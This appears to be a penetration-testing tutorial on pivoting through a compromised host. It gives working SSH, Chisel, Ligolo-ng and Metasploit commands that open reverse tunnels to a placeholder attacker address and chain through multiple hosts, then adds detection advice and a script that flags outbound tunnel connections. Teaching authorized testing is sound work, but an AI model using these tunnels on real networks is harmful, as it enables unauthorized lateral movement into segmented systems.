Pivoting is the technique of using a compromised host as a relay to attack additional systems in network segments that aren’t directly accessible from your attack machine. It’s a critical skill in penetration testing — most real networks have segmentation, and gaining access to the DMZ is rarely the final objective. This guide covers the most practical pivoting and tunneling tools used in modern pentests.
Conceptual Overview
Imagine this network layout:
Attack Box → [Internet] → DMZ Host (10.10.10.5) → [Internal Network] → 192.168.1.0/24
Your attack box can reach the DMZ host, but not the internal 192.168.1.0/24 range directly. Once you compromise 10.10.10.5, you need to pivot through it to reach internal targets.
Method 1: SSH Port Forwarding
SSH provides three types of port forwarding, all useful in different scenarios.
Local Port Forwarding
Forward a local port to a remote service through the pivot host:
# Access 192.168.1.10:3389 (RDP) via your local port 3389
ssh -L 3389:192.168.1.10:3389 user@10.10.10.5
# Then connect RDP to localhost:3389
xfreerdp /v:localhost:3389 /u:admin /p:password
Dynamic Port Forwarding (SOCKS Proxy)
Create a SOCKS5 proxy through the SSH connection — routes all traffic through the pivot:
ssh -D 1080 user@10.10.10.5 -N -f
Configure tools to use the proxy:
# ProxyChains config (/etc/proxychains4.conf): replace the default "socks4 127.0.0.1 9050" line with
socks5 127.0.0.1 1080
# Run tools through it. nmap needs a full TCP connect scan with host discovery disabled:
# SOCKS only carries TCP streams, so raw SYN probes and ICMP pings silently bypass the proxy
proxychains nmap -sT -Pn -sV 192.168.1.0/24
proxychains curl http://192.168.1.10/
proxychains crackmapexec smb 192.168.1.0/24
Remote Port Forwarding
Expose an internal service to your attack box when the pivot can’t accept incoming connections:
# Run on the pivot host: it dials out to your attack box, and port 8080 on the attack box
# (bound to loopback by default) then reaches the pivot's local port 80
ssh -R 8080:localhost:80 attacker@YOUR_IP
Method 2: Chisel — Firewall-Friendly Tunneling
Chisel creates TCP/UDP tunnels over HTTP, making it ideal when only outbound web traffic is allowed. It’s statically compiled, requiring no dependencies on the target.
# Download on attack machine (release assets carry the version in their name,
# chisel_<version>_linux_amd64.gz, so adjust the filename to the current release)
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64 && mv chisel_linux_amd64 /opt/chisel
# Transfer chisel to pivot host
scp /opt/chisel user@10.10.10.5:/tmp/chisel
SOCKS proxy via Chisel:
# On attack machine — start server
./chisel server --reverse --port 8888
# On pivot host — connect back and create SOCKS proxy
./chisel client YOUR_ATTACK_IP:8888 R:socks
This creates a SOCKS5 proxy on your attack machine at 127.0.0.1:1080, the same address the proxychains config from Method 1 points at, so tools are routed through it with proxychains exactly as before (including the -sT -Pn requirement for nmap).
Forward a specific port:
# Attack machine (server)
./chisel server --reverse --port 8888
# Pivot (client) — forward internal RDP
./chisel client YOUR_IP:8888 R:3389:192.168.1.10:3389
Method 3: Ligolo-ng — Advanced Transparent Tunneling
Ligolo-ng is a modern tunneling tool that creates a full network interface on your attack machine, making pivoting completely transparent — no need for proxychains.
# Download agent and proxy
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_agent_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_linux_amd64.tar.gz
# On attack machine — start proxy
sudo ./proxy -selfcert -laddr 0.0.0.0:11601
# Transfer agent to pivot and run
./agent -connect YOUR_IP:11601 -ignore-cert
In the Ligolo proxy console:
ligolo-ng » session # Select the agent session
ligolo-ng » tunnel_start # Start the tunnel
# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo
Now you can communicate with 192.168.1.0/24 directly from your attack box without proxychains. Because traffic leaves through a real network interface rather than a SOCKS proxy, nmap (including SYN scans and ping sweeps), Metasploit and Burp Suite all work natively.
Method 4: Metasploit Autoroute and SOCKS Proxy
If you have a Meterpreter session, use Metasploit’s built-in routing:
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > background
msf > use auxiliary/server/socks_proxy
msf > set SRVPORT 1080
msf > set VERSION 5
msf > run -j
# Now use proxychains (socks5 127.0.0.1 1080 in proxychains4.conf, as in Method 1)
proxychains nmap -sT -Pn -sV 192.168.1.10
Multi-Hop Pivoting
In segmented networks, you may need to pivot through multiple hosts:
Attack → Host A (10.10.10.5) → Host B (192.168.1.5) → Internal (172.16.0.0/24)
With Chisel, chain pivots:
# On attack: server
./chisel server --reverse --port 8888
# On Host A: connect back and open a SOCKS proxy on the attack box (127.0.0.1:1080, egress via Host A);
# additionally listen on Host A's port 9000 and relay it through the tunnel to the chisel server itself
./chisel client ATTACK_IP:8888 R:socks 0.0.0.0:9000:127.0.0.1:8888
# On Host B: reach the attack box's chisel server via Host A's port 9000, and open a second SOCKS
# proxy on a different port so it doesn't clash with the one Host A already created
./chisel client HOST_A_IP:9000 R:1081:socks
# On attack: socks5 127.0.0.1 1081 in proxychains4.conf now reaches 172.16.0.0/24 through Host B
Detection Considerations
When testing your own network, pivoting tools leave traces:
- SSH tunnels appear in /var/log/auth.log and SSH audit logs
- Chisel/Ligolo traffic looks like normal HTTPS but may have unusual destination IPs
- Metasploit routing leaves the Meterpreter process and its connection back to the handler visible in process listings and netstat on the pivot
Monitor outbound connections from internal hosts that typically don’t make external connections.
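As an added example (not code from the original page), a small POSIX shell/awk check for that last point: it reads `ss -tnp` output and lists every established connection whose peer lies outside private address space, together with the owning process. The `ss` output and process names embedded below are constructed sample data; the check assumes IPv4 peers and that `ss` was run as root so the Process column is populated.

```shell
#!/bin/sh
# Constructed sample of `ss -tnp` output from an internal host (not real data).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB  0      0      192.168.1.10:49812   192.168.1.5:445     users:(("smbd",pid=812,fd=9))
ESTAB  0      0      192.168.1.10:51020   203.0.113.7:8888    users:(("chisel",pid=4410,fd=3))
ESTAB  0      0      192.168.1.10:51044   192.168.1.2:53      users:(("resolved",pid=300,fd=12))
ESTAB  0      0      192.168.1.10:51102   198.51.100.9:11601  users:(("agent",pid=4521,fd=7))
ESTAB  0      0      192.168.1.10:51200   10.10.10.5:22       users:(("ssh",pid=4600,fd=3))'

# Read `ss -tnp` text on stdin; print "<peer:port> <process>" for each ESTAB
# connection whose peer is outside 10/8, 127/8, 172.16/12 and 192.168/16.
flag_external_conns() {
  awk '
    $1 == "ESTAB" {
      split($5, peer, ":"); split(peer[1], o, ".")
      private = (o[1] == 10) || (o[1] == 127) || (o[1] == 192 && o[2] == 168) ||
                (o[1] == 172 && o[2] >= 16 && o[2] <= 31)
      if (!private) {
        # Process column looks like users:(("chisel",pid=4410,fd=3)); keep the name only
        proc = $6
        sub(/^users:\(\("/, "", proc); sub(/".*/, "", proc)
        print $5, (proc == "" ? "?" : proc)
      }
    }'
}

# Run the check over the constructed sample; on a live host use: ss -tnp | flag_external_conns
scan_sample() {
  printf '%s\n' "$SAMPLE_SS" | flag_external_conns
}

scan_sample
```

Only the two tunnel processes (chisel and the Ligolo agent) are reported; the SMB, DNS and SSH connections to private addresses are not.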
Practice Resources
- HackTheBox Pro Labs (Offshore, RastaLabs) — multi-network environments
- TryHackMe: Wreath — hands-on pivoting network
- VulnHub: Kioptrix series — simple pivoting scenarios
- SANS SEC560 course covers pivoting extensively
Pivoting mastery separates intermediate from advanced pentesters. The ability to move through network segments quietly and efficiently is essential for OSCP, CRTO, and real-world red team engagements.